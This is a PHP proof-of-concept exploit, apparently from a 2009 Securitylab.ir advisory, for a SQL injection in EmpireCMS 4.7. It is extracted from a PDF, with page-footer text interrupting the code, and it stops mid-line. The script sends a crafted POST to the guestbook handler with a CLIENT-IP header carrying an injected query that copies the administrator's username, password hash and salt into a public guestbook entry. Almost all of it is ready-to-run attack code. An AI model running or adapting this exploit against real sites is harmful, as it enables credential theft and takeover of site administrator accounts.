1 <?php
2 print_r("
3
+−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−+
4 Application Info:
5 Name: EmpireCMS47
6
−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
7 Discoverd By: Securitylab.ir
8 Contacts: info@securitylab[dot]ir
9 Note: just work as php>=5&mysql>=4.1
10 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
11 Vulnerability Info:
12 Sql Injection
13 Medium Risk
14 +−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−+
15 ");
16 if ($argc<3) {
17 echo "Usage: php ".$argv[0]." host path \n";
18 echo "host: target server \n";
19 echo "path: path to EmpireCMS47\n";
20 echo "Example:\r\n";
21 echo "php ".$argv[0]." localhost /\n";
22 die;
23 }
24 $host=$argv[1];
25 $path=$argv[2];
26 $data = "name=11ttt&email=111&call=&lytext=1111&enews=AddGbook";
27 $cmd = "aaaaaaaa’,0,1,’’),(’t00lsxxxx’,’t00lsxxxxx’,’’,’2008−05−28 15:44:17’,(select concat(username,0x5f,password,0x5f,rnd) from phome_enewsuser where
28
userid=1),’’,1,’1111’,0,0,’’)/*";
29 $message = "POST ".$path."/e/enews/index.php"." HTTP/1.1\r\n";
30 $message .= "Referer: http://".$host.$path."/e/tool/gbook/?bid=1\r\n";
31 $message .= "Accept−Language: zh−cn\r\n";
32 $message .= "Content−Type: application/x−www−form−urlencoded\r\n";
33 $message .= "User−Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
34 $message .= "CLIENT−IP: $cmd\r\n";
35 $message .= "Host: $host\r\n";
36 $message .= "Content−Length: ".strlen($data)."\r\n";
37 $message .= "Cookie: ecmsgbookbid=1;\r\n";
38 $message .= "Connection: Close\r\n";
39 $message .= "\r\n";
40 $message .=$data;
41 $ock=fsockopen($host,80);
42 if (!$ock) {
43 echo ’No response from ’.$host;
44 die;
45 }
46 echo "[+]connected to the site!\r\n";
47 echo "[+]sending data nowâM−^@¦âM−^@¦\r\n";
48 fputs($ock,$message);
49 @$resp =’’;
50 while ($ock && !feof($ock))
51 $resp .= fread($ock, 1024);
52 echo $resp;
Page 1/2
Empire CMS 47 SQL Injection
Securitylab Security Research
10/05/2009
53 echo "[+]done!\r\n";
54 echo "[+]go to http://$host$path/e/tool/gbook/?bid=1 see t